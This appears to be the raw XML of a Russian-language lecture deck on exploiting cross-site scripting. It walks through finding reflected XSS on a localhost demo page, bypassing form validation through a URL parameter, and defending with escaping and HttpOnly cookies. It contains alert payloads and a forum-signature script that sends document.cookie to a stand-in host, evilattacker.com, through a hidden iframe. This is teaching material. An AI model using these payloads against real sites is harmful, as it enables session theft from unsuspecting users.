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90" r:id="rId4"/>
    <p:sldId id="291" r:id="rId5"/>
    <p:sldId id="292" r:id="rId6"/>
    <p:sldId id="293" r:id="rId7"/>
    <p:sldId id="294" r:id="rId8"/>
    <p:sldId id="295" r:id="rId9"/>
    <p:sldId id="296" r:id="rId10"/>
    <p:sldId id="297" r:id="rId11"/>
    <p:sldId id="298" r:id="rId12"/>
    <p:sldId id="299" r:id="rId13"/>
    <p:sldId id="300" r:id="rId14"/>
    <p:sldId id="301" r:id="rId15"/>
    <p:sldId id="302" r:id="rId16"/>
    <p:sldId id="303" r:id="rId17"/>
    <p:sldId id="288" r:id="rId18"/>
    <p:sldId id="289" r:id="rId1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46" d="100"/>
          <a:sy n="46" d="100"/>
        </p:scale>
        <p:origin x="65" y="9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742" y="5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F11F1C-356F-459B-BDD8-670C60A54910}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>21.07.2022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AE756A-3E91-4A6E-A2C6-0701203274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17492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6A6DE6-CBC0-620D-E890-538162D215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F8F6E86-9E19-3A51-892F-34EA254EBB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7F30C7B-6236-1F50-BA9D-39FCFEB0D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995F-0D0C-4339-94CC-E2EE616AB078}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>21.07.2022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9E54473-DA39-F782-B3D7-6E0BF66AE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0CAA796-01B2-9D2F-B5F2-F1D2FB0E7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F652-B071-4D7A-A7BC-AA9925BFF8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9609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67F329-23F0-3119-D29C-D85DEF708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8182E01-675E-1816-6127-26AF7817A7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5E55C56-C38C-2BF0-97CA-D7E5C21FB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995F-0D0C-4339-94CC-E2EE616AB078}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>21.07.2022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761F342-DFF6-ADED-7284-A283881F1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5DC2F2B-A40A-D06D-86BE-3D6465529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F652-B071-4D7A-A7BC-AA9925BFF8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7327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137212C-24B9-A356-3CF5-3BD1A87589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C68C39F-695C-57F1-D4DF-502D5F5671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CA835F9-3AEA-CE24-2973-95D440EF8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995F-0D0C-4339-94CC-E2EE616AB078}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>21.07.2022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FF5A2AC-74D9-B9E8-7474-FB2CC9B64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5C4CC6D-ECD5-BF53-7D12-87336E94B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F652-B071-4D7A-A7BC-AA9925BFF8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4767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B9BDC9-8299-1474-3AF2-693FF8A57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8A47E73-1724-2A4F-455E-3693464DDA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F6EA6E6-F25F-CD7A-6478-53CD83BF4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995F-0D0C-4339-94CC-E2EE616AB078}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>21.07.2022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C67A38E-B2C5-AA54-87BF-5C410AC69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04AEBF2-5493-E787-BC7E-F5DCB5647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F652-B071-4D7A-A7BC-AA9925BFF8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9544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930CA2-F5EB-131B-A5CB-2578F14C4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633D48B-DB54-4A2D-08CB-9542EEC2BD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930389D-51C6-23B1-3744-76CBB68EF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995F-0D0C-4339-94CC-E2EE616AB078}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>21.07.2022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5780A53-9333-1708-4736-2C4CD7729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FC45A1A-0A78-B74B-CD35-A0B6C972D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F652-B071-4D7A-A7BC-AA9925BFF8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4565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03FAB6-BA0B-2B95-BAEC-5629349AE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4D08183-D4BB-3E13-B79A-448095DC7F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654454E-165D-FC3D-CB75-F4106C466E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6BD1ED7-6E94-56E8-3F68-A5503945C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995F-0D0C-4339-94CC-E2EE616AB078}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>21.07.2022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AAF958B-F06A-A8C4-4584-F50E3BF8E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C1CA436-4797-0B4F-095E-3216C8849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F652-B071-4D7A-A7BC-AA9925BFF8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1898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6BC59E-6FE9-97E3-5FC1-59E25460E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0F4F817-8A02-3C78-EEDD-D4F125A6BB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8FC496C-EA81-78F2-592A-EB165EE392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7E49155-E271-7B50-580D-8D78B1893B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82F9E06-73C4-8158-B037-800B847989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9AEEA1D-5725-9C8C-0D47-D9AA5186B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995F-0D0C-4339-94CC-E2EE616AB078}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>21.07.2022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A13D64D-5927-02A3-3DDA-F441947C1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809E034-300F-B8D7-8B11-FD17674BD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F652-B071-4D7A-A7BC-AA9925BFF8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7680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912277-E863-457D-CB3B-188A2D59B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66B6B2C-4296-4605-0F09-40A0FE17B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995F-0D0C-4339-94CC-E2EE616AB078}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>21.07.2022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328460E-9773-5B0A-3853-3A9931203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A315997-C4F6-E9AF-30EF-D4067C4D1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F652-B071-4D7A-A7BC-AA9925BFF8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1461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675AD1B-3F21-7C12-C56B-083BAB367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995F-0D0C-4339-94CC-E2EE616AB078}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>21.07.2022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D815BE6-4A6D-596E-674E-159EE2B8E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8DDAA44-410B-A0F1-3588-677BDE884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F652-B071-4D7A-A7BC-AA9925BFF8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5366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8D5F98-A9E5-EB12-C0F1-8524F45B2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1B81510-7D0C-FC19-540F-0C760FC93F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ED8F40A-9DAB-C3D6-102A-5C340B335C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A1A1F7F-1F76-D04C-5147-20A571BF3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995F-0D0C-4339-94CC-E2EE616AB078}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>21.07.2022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1FC3A78-8A7A-3D1B-A4B7-60F73AB70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38EC8E7-3A14-32F6-3DCF-7AA8F6233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F652-B071-4D7A-A7BC-AA9925BFF8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9951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7DE62C-AA44-5A64-DE08-2D2FE0A1F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4751035-9A35-C16F-9698-51C96FD9E4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3A4C86F-84B0-9804-AC25-67D3CFE1FA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ADBFEF5-8EEE-F358-A6DA-589FFB2EB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995F-0D0C-4339-94CC-E2EE616AB078}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>21.07.2022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584BC5A-C0AC-A721-5AB4-5F06839D3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E579EF0-8C25-E120-B5B2-5F62371E3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F652-B071-4D7A-A7BC-AA9925BFF8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6311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8B1648-337D-2E29-0B8D-AA59DBE61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ACAD9A-0884-5B1B-9C9D-9371B91553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C05F544-A686-F8C2-5BA5-63F3C268AE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1A995F-0D0C-4339-94CC-E2EE616AB078}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>21.07.2022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22749B0-35B9-881A-FD00-8DCF41AAD2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440B91C-1441-1ABF-182C-6D50C0578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42F652-B071-4D7A-A7BC-AA9925BFF8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8604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E72720-9CDF-0400-AB3C-298F68FFCF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5558" y="2235200"/>
            <a:ext cx="9480884" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Эксплуатация веб-уязвимостей</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Межсайтовый </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>скриптинг</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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20390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D96DDAD0-FA96-5224-DF6A-4A265896F9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05853"/>
            <a:ext cx="10515600" cy="547111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Давайте попробуем вставить какую-нибудь ерунду в поле поиска: “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>fwefewf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Мы увидим, что в этом случае ничего найти на странице не удалось. А текст запроса повторился в тексте ошибки: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Итак, мы с вами обнаружили место, где появляется текст, вводимый нами. Следовательно, это и есть потенциальное место для </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>XSS-уязвимости</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>. Давайте попробуем вставить самый популярный </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>JavaScript-код</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> для проверки, есть ли там уязвимость:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;script&gt;alert(123)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1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0B89F1B-7570-E03F-DE4D-808464715B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5355"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="676947" y="2433644"/>
            <a:ext cx="10838106" cy="1669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4475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C4A03A02-785E-F161-C177-BB0AAE2031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18147"/>
            <a:ext cx="10515600" cy="5358816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В случае, если страница является уязвимой, после ввода этого кода на странице появится вот такое окошко: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Оно и будет означать, что наш </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>JavaScript-код</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> исполнился и мы нашли </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>XSS-уязвимость</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Итак, вводим код и видим следующее предупреждение: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F829A96-B957-E191-F3E6-B125ABB64F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4303"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2441909" y="1646321"/>
            <a:ext cx="7308182" cy="2139616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3E0B0DA-D7F7-27E2-F000-6A730FA4B2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926" y="5057151"/>
            <a:ext cx="9962147" cy="1800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3650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4D8948BB-0BD2-EA2F-C7CB-E3381B2D10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70021"/>
            <a:ext cx="10515600" cy="54069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Форма не позволяет нам осуществить поиск по такому значению, так как форма </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>валидируется</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> и хочет работать только с буквами и цифрами. На первый взгляд кажется, что разработчик все учел и защитил страницу от </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0"/>
              <a:t>но это не совсем так</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Дело в том, что текст, который мы вводим в поле поиска, отображается в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> в так называемом </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>GET-параметре</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>. Имя этого параметра “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>”, а значение — то, что мы вводим в поле поиска. Это сделано для того, чтобы можно было скопировать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> вместе с этой самой строкой поиска и в следующий раз открыть страницу сразу с нужными авторами.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Например, вот такой </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> откроет страницу сразу только с книгами </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0"/>
              <a:t>Рея Брэдбери</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss?q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Рей+Брэдбери</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" u="sng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36762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589370DA-C0FB-5FEA-CD06-54A7BC10F6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18719"/>
            <a:ext cx="10515600" cy="5890627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Проверим, не забыл ли наш разработчик все учесть тут. Попробуем в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>GET-параметр</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>” подставить тот самый </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>JavaScript-код</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/demo/xss?q=&lt;script&gt;alert(123)&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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Перейдя по этому </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> мы видим, что на странице появилось окошко со значением 123.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Разработчик написал валидацию поля ввода и решил, что так он защитил сайт от того, чтобы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> мог оказаться в поисковом запросе. И не стал экранировать текст ошибки. Нам же удалось обойти валидацию через </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, поменяв там значение поискового запроса.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Ради интереса теперь можем вывести значение нашей сессионной </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cookie, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>для этого вместо </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>script&gt;alert()&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>надо подставить другой код: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>)&lt;/script&gt;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6198067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B54FF9-7FD5-61BF-C570-34970D420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Способов закрыть ошибку довольно много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B129D067-54FC-0BBF-C567-3217DCE271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Экранировать текст — не единственный из них. Еще можно запретить самому </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> видеть некоторые </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>. Для этого у </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> есть специальный параметр “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>”. Если он выставлен в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>TRUE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> никак не сможет узнать, что такая </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> вообще выставлена и не сможет ее прочитать и передать злоумышленнику даже в том случае, если ему удастся найти </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> на вашем проекте.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Все это — лишь малый, далеко не полный список манипуляций, предотвращающий </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>XSS-уязвимости</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>. При обнаружении </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> в ходе тестирования лучше всего пообщаться с программистами и настучать по голове разработчику. (но не перебарщивайте =)  )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79190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AF9A6A-C257-3878-66B4-E0BFE44F4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Более жестокий, но реальный пример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AD823A9-162C-10CD-FFBF-C5AC2901B7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Злоумышленник наткнулся на форум (имя которого я не назову, дабы не подрывать авторитет компании), который позволяет пользователям отображать небольшую подпись под своими комментариями. Злоумышленник создаёт учетную запись, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>спамит</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> во всех темах в пределах досягаемости, применяя следующую подпись к своим сообщениям:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>('&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>="http://evilattacker.com?cookie='</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>    + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>document.cookie.escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>() + '" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>height</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>=0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>width</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>=0 /&gt;');&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1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4182201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EF1D5997-6811-EB93-0C8D-191B0753B5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737937"/>
            <a:ext cx="7137734" cy="5439026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Каким-то чудом движок форума включает эту подпись во все </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>заспамленные</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> топики, и пользователи начинают загружать этот код. Результат очевиден. Злоумышленник внедряет в страницу элемент </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, который будет отображаться как крошечная точка (нулевого размера) в самом низу страницы, не привлекая никакого внимания. Браузер отправит запрос на содержимое </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, и в злоумышленнику будут переданы значения </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>кук</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> каждого участника форума в виде </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>GET-параметра</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Вот и поболтали на форуме =/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097FF6E-7191-2BEB-4251-395C625E41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5935" y="1519112"/>
            <a:ext cx="3619500" cy="387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5703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B569EB-9C8E-6FA5-A2AC-D0E87814E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362C76D-2C3A-E48A-2DDF-1E4BDC33F1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Как показывает статистика, многие веб-разработчики просто «забивают» на такую уязвимость, как </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>. В следствие чего, компании несут убытки, пользователи теряют данные, а горе-разработчики – работу. В связи с чем призываю вас в своей дальнейшей деятельности обращать особое внимание на данную уязвимость и закрывать абсолютно все возможные «дыры».</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38619044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5F2307-B5F3-AC33-4C49-EACAF64E8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Домашнее задание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10897B7-1E55-5EAF-D218-FE7F3B1E66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Произвести атаку </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> на тестовом сайте</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180323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1BEC5A-2DA3-49E4-94B9-D0DAE7BCE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cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr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6FC98D-1F0C-9E27-33AA-5AB642F267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cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Межсайтовый </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>скриптинг</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
